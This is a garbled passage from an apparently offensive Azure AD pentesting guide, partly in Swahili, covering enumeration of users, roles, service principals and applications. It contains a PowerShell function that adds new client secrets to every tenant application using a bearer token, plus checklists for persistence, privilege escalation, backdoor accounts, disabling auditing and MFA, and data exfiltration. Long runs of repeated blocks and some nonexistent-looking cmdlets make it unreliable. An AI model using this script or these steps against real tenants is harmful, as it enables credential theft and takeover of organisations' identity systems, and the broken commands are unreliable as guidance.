List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
List Azure AD Directory Role Scope Members
```
Get-AzADDirectoryRoleScopeMember
```
List Azure AD Directory Role Scopes
```
Get-AzADDirectoryRoleScope
```
**List Azure AD Directory

# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>

$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method  = 'GET'
Uri     = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

Mmiliki wa Mwakilishi wa Huduma anaweza kubadilisha nenosiri lake.

Orodhesha na jaribu kuongeza siri ya mteja kwa kila Programu ya Kampuni

```powershell # Just call Add-AzADAppSecret Function Add-AzADAppSecret { <# .SYNOPSIS Add client secret to the applications.

.PARAMETER GraphToken Pass the Graph API Token

.EXAMPLE PS C:> Add-AzADAppSecret -GraphToken 'eyJ0eX..'

.LINK https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http https://docs.microsoft.com/en-us/graph/api/application-addpassword?view=graph-rest-1.0&tabs=http #>

[CmdletBinding()] param( [Parameter(Mandatory=$True)] [String] $GraphToken = $null )

$AppList = $null $AppPassword = $null

List All the Applications

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications" "Method" = "GET" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

try { $AppList = Invoke-RestMethod @Params -UseBasicParsing } catch { }

Add Password in the Application

if($AppList -ne $null) { [System.Collections.ArrayList]$Details = @()

foreach($App in $AppList.value) { $ID = $App.ID $psobj = New-Object PSObject

$Params = @{ "URI" = "https://graph.microsoft.com/v1.0/applications/$ID/addPassword" "Method" = "POST" "Headers" = @{ "Content-Type" = "application/json" "Authorization" = "Bearer $GraphToken" } }

$Body = @{ "passwordCredential"= @{ "displayName" = "Password" } }

try { $AppPassword = Invoke-RestMethod @Params -UseBasicParsing -Body ($Body | ConvertTo-Json) Add-Member -InputObject $psobj -NotePropertyName "Object ID" -NotePropertyValue $ID Add-Member -InputObject $psobj -NotePropertyName "App ID" -NotePropertyValue $App.appId Add-Member -InputObject $psobj -NotePropertyName "App Name" -NotePropertyValue $App.displayName Add-Member -InputObject $psobj -NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId Add-Member -InputObject $psobj -NotePropertyName "Secret" -NotePropertyValue $AppPassword.secretText $Details.Add($psobj) | Out-Null } catch { Write-Output "Failed to add new client secret to '$($App.displayName)' Application." } } if($Details -ne $null) { Write-Output "" Write-Output "Client secret added to : " Write-Output $Details | fl * } } else { Write-Output "Failed to Enumerate the Applications." } }

</details>

### Majukumu

<div data-gb-custom-block data-tag="tabs"></div>

<div data-gb-custom-block data-tag="tab" data-title='az cli'>

```bash
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
az role assignment list --all | jq '.[] | .roleDefinitionName,.scope'
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].{principalName:principalName,principalType:principalType,resourceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?roleDefinitionName=='<ROLE_NAME>']"

Azure AD

Enumeration

Get Tenant Information: az account show
List Subscriptions: az account list
Set Subscription: az account set --subscription <SUBSCRIPTION_ID>
List Azure AD Users: az ad user list
List Azure AD Groups: az ad group list
List Azure AD Service Principals: az ad sp list
List Azure AD Applications: az ad app list
List Azure AD Devices: az ad signed-in-user show --query userPrincipalName
Get Azure AD User: az ad user show --id <USER_ID>
Get Azure AD Group: az ad group show --group <GROUP_ID>
Get Azure AD Service Principal: az ad sp show --id <SERVICE_PRINCIPAL_ID>
Get Azure AD Application: az ad app show --id <APPLICATION_ID>
Get Azure AD Device: az ad signed-in-user show --query userPrincipalName

Persistence

Create Azure AD Application: az ad app create --display-name <APP_NAME> --password <PASSWORD>
Create Azure AD Service Principal: az ad sp create --id <APPLICATION_ID>
Add Member to Azure AD Group: az ad group member add --group <GROUP_ID> --member-id <USER_ID>

Privilege Escalation

Add User to Azure AD Role: az role assignment create --assignee <USER_ID> --role <ROLE_NAME> --scope /
Add Service Principal to Azure AD Role: az role assignment create --assignee <SERVICE_PRINCIPAL_ID> --role <ROLE_NAME> --scope /

Dumping

Dump Azure AD Users: az ad user list
Dump Azure AD Groups: az ad group list
Dump Azure AD Service Principals: az ad sp list
Dump Azure AD Applications: az ad app list
Dump Azure AD Devices: az ad signed-in-user show --query userPrincipalName

Miscellaneous

Login to Azure CLI: az login
Logout from Azure CLI: az logout

# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} | select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *

Az PowerShell

Install Az PowerShell Module

Install-Module -Name Az -AllowClobber -Scope CurrentUser -Force -Repository PSGallery

Connect to Azure AD
```
Connect-AzAccount
```
List all Azure AD users
```
Get-AzADUser
```
List all Azure AD groups
```
Get-AzADGroup
```
List all Azure AD applications
```
Get-AzADApplication
```
List all Azure AD service principals
```
Get-AzADServicePrincipal
```
List all Azure AD devices
```
Get-AzADDevice
```
List all Azure AD roles
```
Get-AzADRole
```

# Get role assignments on the subscription
Get-AzRoleDefinition
# Get Role definition
Get-AzRoleDefinition -Name "Virtual Machine Command Executor"
# Get roles of a user or resource
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com
Get-AzRoleAssignment -Scope /subscriptions/<subscription-id>/resourceGroups/<res_group_name>/providers/Microsoft.Compute/virtualMachines/<vm_name>

# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-108d-4049-8c11-d52d5d388768/resourceGroups/Research/providers/Microsoft.Compute/virtualMachines/infradminsrv/providers/Microsoft.Authorization/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

Vifaa

# If you know how to do this send a PR!

Azure AD

Enumeration

Get Azure AD users: az ad user list
Get Azure AD groups: az ad group list
Get Azure AD group members: az ad group member list --group <group_id>
Get Azure AD applications: az ad app list
Get Azure AD service principals: az ad sp list
Get Azure AD roles: az role definition list
Get Azure AD role assignments: az role assignment list

Dumping

Dump Azure AD users: az ad user list
Dump Azure AD groups: az ad group list
Dump Azure AD group members: az ad group member list --group <group_id>
Dump Azure AD applications: az ad app list
Dump Azurejson AD service principals: az ad sp list
Dump Azure AD roles: az role definition list
Dump Azure AD role assignments: az role assignment list

Persistence

Create Azure AD user: az ad user create
Add user to Azure AD group: az ad group member add --group <group_id> --member-id <user_id>
Add application to Azure AD: az ad app create
Add service principal to Azure AD: az ad sp create

Privilege Escalation

Assign role to Azure AD user: az role assignment create --assignee <user_id> --role <role_id>
Add user to Azure AD role: az role assignment create --assignee <user_id> --role <role_id>

Lateral Movement

Use Azure AD credentials to log in: az login --username <username> --password <password>

Exfiltration

Export Azure AD users to CSV: az ad user list --query "[].{UserPrincipalName:userPrincipalName}" --output csv > users.csv
Export Azure AD groups to CSV: az ad group list --query "[].{DisplayName:displayName}" --output csv > groups.csv
Export Azure AD group members to CSV: az ad group member list --group <group_id> --query "[].{DisplayName:displayName,UserPrincipalName:userPrincipalName}" --output csv > group_members.csv
Export Azure AD applications to CSV: az ad app list --query "[].{DisplayName:displayName}" --output csv > applications.csv
Export Azure AD service principals to CSV: az ad sp list --query "[].{DisplayName:displayName}" --output csv > service_principals.csv
Export Azure AD roles to CSV: az role definition list --query "[].{RoleName:roleName}" --output csv > roles.csv
Export Azure AD role assignments to CSV: az role assignment list --query "[].{PrincipalName:principalName,RoleDefinitionName:roleDefinitionName}" --output csv > role_assignments.csv

# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Registred users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-AzureADDeviceRegisteredUser -ObjectId $_.ObjectID){$_;$user.UserPrincipalName;"`n"}}
# Get dives managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where {$_.ObjectId -eq $deviceObjId} }

Ikiwa kifaa (VM) kimejiunga na AzureAD, watumiaji kutoka AzureAD wataweza kuingia. Zaidi ya hayo, ikiwa mtumiaji aliyeingia ni Mmiliki wa kifaa, atakuwa msimamizi wa ndani.

Maombi

Programu ni Usajili wa Programu kwenye portal (sio Maombi ya Kampuni). Lakini kila Usajili wa Programu utaunda Maombi ya Kampuni (Mwakilishi wa Huduma) yenye jina sawa. Zaidi ya hayo, ikiwa Programu ni Programu inayoweza kutumiwa na wapangaji wengi, Maombi mengine ya Kampuni (Mwakilishi wa Huduma) yataundwa kwenye mpangaji huo na jina sawa.

Unapounda Programu, aina 2 za ruhusa hupewa:

Ruhusa zilizopewa Mwakilishi wa Huduma
Ruhusa ambazo programu inaweza kuwa nazo na kutumia kwa niaba ya mtumiaji.

# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials != null].displayName"
# List apps that have key credentials (use of certificate authentication)
az ad app list --query "[?keyCredentials != null].displayName"

Azure AD

Enumeration

Get Azure AD users: az ad user list
Get Azure AD groups: az ad group list
Get Azure AD group members: az ad group member list --group <group_id>
Get Azure AD applications: az ad app list
Get Azure AD service principals: az ad sp list

Dumping

Dump Azure AD users: az ad user list
Dump Azuread groups: az ad group list
Dump Azure AD group members: az ad group member list --group <group_id>
Dump Azure AD applications: az ad app list
Dump Azure AD service principals: az ad sp list

Password Spraying

Password spray Azure AD accounts: Use tools like MSOLSpray or AzureSpray

Brute Force

Brute force Azure AD accounts: Use tools like CrackMapExec, Evil-WinRM, or Rubeus

Persistence

Create Azure AD application: az ad app create --display-name <app_name> --password <password>
Add credentials to Azure AD application: az ad app credential reset --id <app_id> --password <new_password>

Privilege Escalation

Add user to Azure AD group: az ad group member add --group <group_id> --member-id <user_id>
Add user to Azure AD role: az role assignment create --assignee <user_id> --role <role_name>

Lateral Movement

List Azure AD group members: az ad group member list --group <group_id>
List Azure AD applications: az ad app list
List Azure AD service principals: az ad sp list

Exfiltration

Exfiltrate Azure AD data: Use tools like BloodHound or SharpHound

Covering Tracks

Delete Azure AD application: az ad app delete --id <app_id>
Remove user from Azure AD group: az ad group member remove --group <group_id> --member-id <user_id>

References

# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id>  | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-AzureADApplicationPasswordCredential -ObjectID $_.ObjectID){$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-AzureADApplicationOwner |fl *

Az PowerShell

Connect to Azure AD
```
Connect-AzAccount
```
List all users
```
Get-AzADUser
```
List all groups
```
Get-AzADGroup
```
List all applications
```
Get-AzADApplication
```
List all service principals
```
Get-AzADServicePrincipal
```
List all devices
```
Get-AzADDevice
```
List all role assignments
```
Get-AzRoleAssignment
```
List all role definitions
```
Get-AzRoleDefinition
```

List all role assignments for a specific user

Get-AzRoleAssignment -SignInName user@example.com

List all role assignments for a specific group
```
Get-AzRoleAssignment -ObjectId <group_object_id>
```
List all role assignments for a specific application
```
Get-AAzRoleAssignment -ApplicationId <application_id>
```

List all role assignments for a specific service principal

Get-AzRoleAssignment -ServicePrincipalName <service_principal_name>

List all role assignments for a specific device
```
Get-AzRoleAssignment -DeviceId <device_id>
```

json


14. **List all role assignments for a specific scope**
 ```bash
 Get-AzRoleAssignment -Scope <scope>
 ```

15. **List all role assignments for a specific role definition**
 ```bash
 Get-AzRoleAssignment -RoleDefinitionName <role_definition_name>
 ```

</div>

```powershell
# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential

Programu yenye ruhusa AppRoleAssignment.ReadWrite inaweza kupanda hadhi hadi Global Admin kwa kujipa jukumu hilo. Kwa maelezo zaidi angalia hapa.

Kamba ya siri ambayo programu hutumia kuthibitisha utambulisho wake wakati wa kuomba token ni nenosiri la programu. Kwa hivyo, ukigundua nenosiri hili unaweza kupata ufikiaji kama mkuu wa huduma ndani ya mpangaji. Tafadhali kumbuka kuwa nenosiri hili ni wazi tu wakati wa kuzalishwa (unaweza kulibadilisha lakini huwezi kulipata tena). Mmiliki wa programu anaweza kuongeza nenosiri kwake (ili aweze kujifanya). Kuingia kama hawa mkuu wa huduma hawatakuwa na alama ya hatari na hawatakuwa na MFA.

Tofauti Kati ya Programu na (Programu za Kampuni au Mkuu wa Huduma)

Tofauti kati ya programu na Mkuu wa Huduma katika Azure:

Programu/Viandikishaji vya Programu: Ni programu zilizopo katika Azure AD yako
(Pata-AzureADApplication -filter "DisplayName eq 'testapp'")
Mkuu wa Huduma/Programu za Kampuni: Vitu vya usalama katika Azure AD yako ambavyo vinaweza kuwa na ruhusa katika Dhibiti la Azure na vimeunganishwa na programu yako au programu ya mtu wa tatu
Pata-AzureADServicePrincipal -filter "DisplayName eq 'testapp'")
Msimamizi anaweza kuhitaji kupitisha ruhusa zilizotolewa ikiwa ni nyeti sana.

Programu inaweza kuwa inaendesha Mpangaji wa mtu wa tatu na mara tu unapoanza kutumia na kumpa ufikiaji Mkuu wa Huduma/Programu ya Kampuni inaundwa katika mpangaji wako ili kumpa ufikiaji wa habari anayohitaji:

Vitengo vya Utawala

Inatumika kwa usimamizi bora wa watumiaji.

Vitengo vya utawala vinazuia ruhusa katika jukumu kwa sehemu yoyote ya shirika lako unayoidhinisha. Unaweza, kwa mfano, kutumia vitengo vya utawala kutekeleza jukumu la Msimamizi wa Msaada wa Dawati la Msaada kwa wataalamu wa msaada wa kikanda, ili waweze kusimamia watumiaji tu katika eneo wanalounga mkono.

Kwa hivyo, unaweza kuteua majukumu kwa kitengo cha msimamizi na wanachama wake watapata majukumu haya.

AzureAD

Enumeration

User Enumeration: Use the Graph API to enumerate users.
Group Enumeration: Use the Graph API to enumerate groups.
Application Enumeration: Use the Graph API to enumerate applications.
Service Principal Enumeration: Use the Graph API to enumerate service principals.

Exploitation

Password Spraying: Perform password spraying attacks against Azure AD accounts.
Brute Force: Perform brute force attacks against Azure AD accounts.
Phishing: Use phishing techniques to steal Azure AD credentials.
Token Impersonation: Exploit token impersonation vulnerabilities to gain unauthorized access.

Persistence

Backdoor Account: Create a backdoor account in Azure AD for persistence.
Application Consent: Abuse application consent to maintain access.
OAuth Token: Steal OAuth tokens to maintain persistence.

Lateral Movement

Azure Resource Access: Move laterally by accessing other Azure resources.
Azure AD Connect: Exploit Azure AD Connect to move laterally within the Azure environment.
Pass-the-Hash: Use pass-the-hash techniques to move laterally.

Defense Evasion

Disable Auditing: Disable auditing to avoid detection.
Modify Sign-In Logs: Modify sign-in logs to hide malicious activity.
Disable MFA: Disable multi-factor authentication to make attacks easier.

Exfiltration

Data Exfiltration: Exfiltrate sensitive data from Azure AD.
Export Logs: Export logs to external locations for further analysis.
Steal Tokens: Steal tokens to facilitate data exfiltration.

Impact

Data Theft: Steal sensitive data stored in Azure AD.
Account Takeover: Take over Azure AD accounts for malicious purposes.
Service Disruption: Disrupt Azure services by compromising Azure AD.

Detection

Anomaly Detection: Implement anomaly detection to identify suspicious activities.
Monitoring Logs: Monitor logs for unusual behavior indicating a potential compromise.
Alerting Mechanisms: Set up alerting mechanisms for Azure AD security events.

References

```powershell # Get Administrative Units Get-AzureADMSAdministrativeUnit Get-AzureADMSAdministrativeUnit -Id # Get ID of admin unit by string $adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter "displayname eq 'Test administrative unit 2'" # List the users, groups, and devices affected by the administrative unit Get-AzureADMSAdministrativeUnitMember -Id # Get the roles users have over the members of the AU Get-AzureADMSScopedRoleMembership -Id | fl #Get role ID and role members ``` ## Azure AD Identity Protection (AIP)

Azure AD Identity Protection (AIP) ni huduma ya usalama inayotumia ugunduzi na urekebishaji wa moja kwa moja kusaidia kulinda vitambulisho vya watumiaji katika Azure Active Directory visidukuliwe. AIP inachunguza na kutathmini hatari za kuingia kwa watumiaji na mipangilio ya vitambulisho, kisha kutumia hatua sahihi za usalama moja kwa moja, kama vile kuhitaji uthibitishaji wa hatua nyingi au kuzuia shughuli hatari. Hii husaidia mashirika kuzuia uvunjaji wa usalama unaotokana na vitambulisho.

Mchakato:

Azure AD Identity Protection inachunguza shughuli za watumiaji na kukusanya data kuhusu kuingia, matukio ya uthibitishaji, na shughuli zingine muhimu.
Huduma hutumia algorithms za machine learning kuchambua data hii na kugundua vitisho vya usalama.
Azure AD Identity Protection inapanga kiwango cha hatari ya tishio (k.m. kuingia) na kutoa tahadhari ikiwa inahitajika kufanya hatua moja kwa moja.

Azure AD Password Protection (APP)

Azure AD Password Protection (APP) ni kipengele cha usalama kinachosaidia kuzuia nywila dhaifu katika Azure Active Directory kwa kutekeleza sera kali za nywila. APP inazuia nywila dhaifu zinazotumiwa mara kwa mara na toleo zake, kupunguza hatari ya uvunjaji unaohusiana na nywila. Inaweza kutumika kwenye ngazi ya wingu na kwenye Active Directory ya ndani, ikiboresha usalama wa nywila kwa jumla katika shirika.

Marejeo

https://learn.microsoft.com/en-us/azure/active-directory/roles/administrative-units

PreviousAz - Device Registration NextAz - Conditional Access Policies / MFA Bypass

Last updated 2 months ago